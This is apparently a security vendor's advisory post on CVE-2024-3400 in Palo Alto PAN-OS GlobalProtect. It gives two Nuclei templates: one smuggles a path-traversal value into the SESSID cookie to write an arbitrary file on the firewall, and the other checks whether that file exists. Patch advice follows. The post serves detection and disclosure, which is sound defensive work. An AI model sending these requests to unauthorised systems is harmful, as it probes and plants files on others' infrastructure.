CVE
April 17, 2024

Gal Nagli

CEO

CVE-2024-3400 - Palo Alto Pan-OS Remote Code Execution

CVE-2024-3400 - Palo Alto Pan-OS Remote Code Execution

Palo Alto has publicly disclosed last week that various versions of their on-prem firewall appliance are vulnerable to CVE-2024-3400 which could lead to Remote Code Execution and has CVSS score of 10.0

Detection and Exploitation

Shockwave were able to create detection templates using Nuclei's YAML rules and to successfully exploit the vulnerability by following public PoC's that were published on the internet, initially at this blog

We have shared our detection template on our dedicated Github Repository for Attack Surface CVE Threats:

Detection Link

Proof of Concept

The POC is divided to 2 parts, first - we create our arbitrary file on the server with the initial nuclei template or the following HTTP Request, it will create "shockwave.txt" file within global-protect/portal/images publicly accessible path

id: CVE-2024-3400

info:
  name: GlobalProtect - OS Command Injection
  author: shockwave
  severity: critical
  reference:
    - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/k4nfr3/nmap-scripts
    - https://github.com/0x0d3ad/CVE-2024-3400
    - https://github.com/FoxyProxys/CVE-2024-3400
    - https://github.com/MrR0b0t19/CVE-2024-3400
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3400
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-3400
    cwe-id: CWE-77
    epss-score: 0.00371
    epss-percentile: 0.72356
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-631559155"
    product: pan-os
    vendor: paloaltonetworks
  tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev

http:
  - raw:
      - |
        POST /ssl-vpn/hipreport.esp HTTP/1.1
        Host: {{Hostname}}
        Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/shockwave.txt;

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - "GlobalProtect Portal"

The 2nd step is to query the created file, if we receive 403 on the specific path, it confirms the file creation, otherwise - the appliance is patched.

id: CVE-2024-3400

info:
  name: GlobalProtect - OS Command Injection
  author: pdresearch,parthmalhotra
  severity: critical
  reference:
    - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/k4nfr3/nmap-scripts
    - https://github.com/0x0d3ad/CVE-2024-3400
    - https://github.com/FoxyProxys/CVE-2024-3400
    - https://github.com/MrR0b0t19/CVE-2024-3400
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3400
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-3400
    cwe-id: CWE-77
    epss-score: 0.00371
    epss-percentile: 0.72356
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-631559155"
    product: pan-os
    vendor: paloaltonetworks
  tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev

http:
  - raw:
      - |
        GET /global-protect/portal/images/shockwave.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 403



It will look like the following:

Vulnerable Instance:

Fixed Instance:

Remediation

Update your Palo Alto Firewalls to the latest version using the suggested patches at https://security.paloaltonetworks.com/CVE-2024-3400

References

   - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
   - https://github.com/fkie-cad/nvd-json-data-feeds
   - https://github.com/k4nfr3/nmap-scripts
   - https://github.com/0x0d3ad/CVE-2024-3400
   - https://github.com/FoxyProxys/CVE-2024-3400
   - https://github.com/MrR0b0t19/CVE-2024-3400
   - https://nvd.nist.gov/vuln/detail/CVE-2024-3400


Closing Words

As always, our customers are the first to know on emerging threats, as proof of our testimony we were also able to be the first to report to various Bug Bounty Programs and help more entities protect their Attack Surface, we have alerted about this particular threat 1 week before public PoC was available.

https://www.linkedin.com/feed/update/urn:li:activity:7184496382420910080/

The security first platform

Supercharge your security

Identify, Secure and Continuously Monitor your Externally Facing Attack Surface.
Significantly Improve your security posture within minutes with an easy, smooth onboarding process.

Get Started
© 2024 Shockwave. All rights reserved.
Terms & Conditions
Cookies
© 2024 Shockwave. All rights reserved.